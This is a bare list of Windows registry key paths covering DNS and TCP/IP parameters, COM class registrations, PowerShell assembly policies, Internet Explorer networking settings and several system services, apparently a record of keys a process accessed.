HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSClient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{0DC265B0-22BB-41D7-A076-B51C28A4C40D}\DhcpDomain
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{50AD0A0A-0497-4CB4-8676-C51D89C211F8}\DhcpDomain
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{E29AC6C2-7037-11DE-816D-806E6F6E6963}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{e29ac6c2-7037-11de-816d-806e6f6e6963}\DhcpDomain
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns
HKEY_CLASSES_ROOT\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.ServiceProcess__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.ServiceProcess__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.WSMan.Management__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.WSMan.Management__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Web.Services__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Web.Services__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.3.0.Microsoft.PowerShell.Commands.Management.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.0.Microsoft.PowerShell.Commands.Management.resources_en-US_31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission
HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_CURRENT_USER\Software\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\RequiredPrivileges
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Group
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\CoInitializeSecurityParam
